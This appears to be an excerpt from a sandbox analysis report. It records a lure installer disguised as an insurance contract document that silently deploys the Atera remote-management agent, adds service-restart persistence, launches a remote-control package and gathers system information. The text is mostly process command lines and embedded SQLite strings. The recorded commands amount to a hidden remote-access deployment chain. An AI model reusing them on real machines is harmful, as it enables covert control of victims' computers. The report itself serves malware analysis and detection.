                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);@X9
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: SELECT Timestamp FROM StatisticsSendTime ORDER BY Timestamp DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);sSELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: SELECT [Id], [Alerts], [Timestamp] FROM [AlertsSent] ORDER BY [Timestamp] DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);/DELETE FROM Statistics;eSELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);@X9
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D72349F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: select Name from Win32_PerfFormattedData_Tcpip_NetworkInterface!DataStatsEnabled9InboundBandwidthStatsEnabled;OutboundBandwidthStatsEnabled
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: SELECT Id, IsActive, Timestamp, Name, Thresholds FROM ThresholdsProfiles ORDER BY Timestamp DESC LIMIT 1;
                                Source: Documento_Contrato_Seguro_25105476.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                                Source: Documento_Contrato_Seguro_25105476.msiReversingLabs: Detection: 23%
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Documento_Contrato_Seguro_25105476.msi"
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 857E432AFA5D0D205F28F10C61316F91
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2E58.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4468656 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI31B4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4469203 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI46E3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4474625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 81F03F72FE72C18167CE907B2496F3F6 E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="primepecasuti@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000OgujIIAR" /AgentId="ef8472c8-8ede-4877-a4a2-21e52a229933"
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI6CA1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4484296 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "b2e2e8e1-1aa5-45e8-a3fe-897e9eed0f74" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "7fdf9479-5622-4845-acad-9b745ab412f6" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ccc76317-d528-48be-b707-c3302c03bc5e" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "43d0d764-ddb0-4812-a25c-540c7752fdf7" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "e2b0e7a4-c205-4ab0-a41f-defa03df179f" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "435e53fd-9fe0-4f2b-90af-84e628f86498" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k smphost
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "03083ea1-baf1-4e78-a683-5c6842958609" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "8156d760-c467-46e9-825a-383940c0c629" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "756f8df8-494a-4cdb-9b3b-3f26b40ddc77" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "3117f898-c24e-40df-9020-7a24bf326b25" agent-api.atera.com/Production 443 or8ixLi90Mf "getlistofallupdates" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 10B2694A2B9C11B571FDCBB60EE82DC9 E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI77D8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4552734 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ff450401-d5c7-4b18-a355-4c1c5f3fd956" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI7BC1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4553718 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "bc07ae14-1fb3-4ad8-825a-cd1339068a47" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 857E432AFA5D0D205F28F10C61316F91Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 81F03F72FE72C18167CE907B2496F3F6 E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="primepecasuti@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000OgujIIAR" /AgentId="ef8472c8-8ede-4877-a4a2-21e52a229933"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 10B2694A2B9C11B571FDCBB60EE82DC9 E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2E58.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4468656 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentIdJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI31B4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4469203 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStartJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI46E3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4474625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallationJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI6CA1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4484296 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEndJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgentJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgentJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "b2e2e8e1-1aa5-45e8-a3fe-897e9eed0f74" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "7fdf9479-5622-4845-acad-9b745ab412f6" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ccc76317-d528-48be-b707-c3302c03bc5e" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "43d0d764-ddb0-4812-a25c-540c7752fdf7" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000OgujIIAR
